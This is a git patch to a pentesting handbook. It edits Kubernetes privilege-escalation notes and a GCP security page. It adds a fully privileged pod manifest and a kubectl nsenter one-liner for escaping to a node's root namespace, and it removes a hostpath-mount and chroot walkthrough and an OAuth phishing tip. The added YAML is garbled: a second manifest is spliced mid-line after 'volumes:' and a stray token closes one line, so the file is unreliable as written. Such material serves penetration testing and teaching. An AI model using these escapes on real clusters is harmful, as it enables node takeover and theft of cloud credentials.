From 398de9e77540f51fcb39ca7745e47cb089c93b88 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Wed, 19 Jan 2022 13:22:07 +0000
Subject: [PATCH] GitBook: [#2959] No subject

---
 cloud-security/gcp-security/README.md         |   8 --
 .../hardening-roles-clusterroles/README.md    | 101 ++++++++----------
 2 files changed, 47 insertions(+), 62 deletions(-)

diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md
index 9b0c8a2a..679fb616 100644
--- a/cloud-security/gcp-security/README.md
+++ b/cloud-security/gcp-security/README.md
@@ -259,14 +259,6 @@ We've automated this completely using [this python script](https://gitlab.com/gi
 [gcp-buckets-brute-force-and-privilege-escalation.md](gcp-buckets-brute-force-and-privilege-escalation.md)
 {% endcontent-ref %}
 
-#### Phishing
-
-You could **OAuth phish** a user with high privileges.
-
-#### Dorks
-
-* **Github**: auth\_provider\_x509\_cert\_url extension:json
-
 ## Generic GCP Security Checklists
 
 * [Google Cloud Computing Platform CIS Benchmark](https://www.cisecurity.org/cis-benchmarks/)
diff --git a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md
index 015f5516..6ee3c779 100644
--- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md
+++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles/README.md
@@ -40,7 +40,7 @@ rules:
   verbs: ["create", "list", "get"]
 ```
 
-### Pod Creation - Steal Token
+### Pod Create - Steal Token
 
 An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**.
 
@@ -77,11 +77,16 @@ So just create the malicious pod and expect the secrets in port 6666:
 
 ![](<../../../.gitbook/assets/image (464).png>)
 
-### **Pod Creation & Escape - Mount Root**
+### **Pod Create & Escape**
 
-Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
+The following definition gives all the privileges a container can have:
 
-{% code title="mount_root.yaml" %}
+* **Privileged access** (disabling protections and setting capabilities)
+* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges
+* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks
+* **Mount hosts / inside the container**
+
+{% code title="super_privs.yaml" %}
 ```yaml
 apiVersion: v1
 kind: Pod
@@ -96,7 +101,32 @@ spec:
     volumeMounts:
     - mountPath: /mnt
       name: volume
-  volumes:
+  volumes:apiVersion: v1
+kind: Pod
+metadata:
+  name: ubuntu
+  labels:
+    app: ubuntu
+spec:
+  # Uncomment and specify a specific node you want to debug
+  # nodeName: <insert-node-name-here>
+  containers:
+  - image: ubuntu
+    command:
+      - "sleep"
+      - "3600" # adjust this as needed -- use only as long as you need
+    imagePullPolicy: IfNotPresent
+    name: ubuntu
+    securityContext:
+      allowPrivilegeEscalation: true
+      privileged: true
+      #capabilities:
+      #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
+      runAsUser: 0 # run as root (or any other user)
+  restartPolicy: Never # we want to be intentional about running this pod
+  hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
+  hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
+  hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_
   - name: volume
     hostPath:
       path: /
@@ -109,60 +139,23 @@ Create the pod with:
 kubectl --token $token create -f mount_root.yaml
 ```
 
-And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
-
-**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
-
-1.  Create a "hostpath volume mount" `pod` manifest.
-
-    ```
-    cat > hostpath.yml <<EOF
-    ---
-    apiVersion: v1
-    kind: Pod
-    metadata:
-      name: hostpath
-    spec:
-      containers:
-      - name: hostpath
-        image: busybox:latest
-        command:
-          - sleep
-          - "86400"
-        volumeMounts:
-          - name: rootfs
-            mountPath: /rootfs
-      restartPolicy: Always
-      volumes:
-        - name: rootfs
-          hostPath:
-            path: /
-    EOF
-    ```
-2.  Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
-
-    ```
-    kubectl apply -f hostpath.yml
-    ```
-3.  Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
-
-    ```
-    kubectl exec -it hostpath /bin/sh
-    ```
-4.  Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
-
-    ```
-    chroot /rootfs /bin/bash
-    ```
-
-### Pod Creation & Escape -  Get into root pid ns
-
-From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
+One-liner from [this tweet](https://twitter.com/mauilion/status/1129468485480751104) and with some additions:
 
 ```bash
 kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
 ```
 
+### Pod Create - Move to cloud
+
+If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\
+Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance.
+
+For more information check:
+
+{% content-ref url="../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md" %}
+[kubernetes-access-to-other-clouds.md](../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
+{% endcontent-ref %}
+
 ### Sniffing **with a sidecar proxy app**
 
 By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.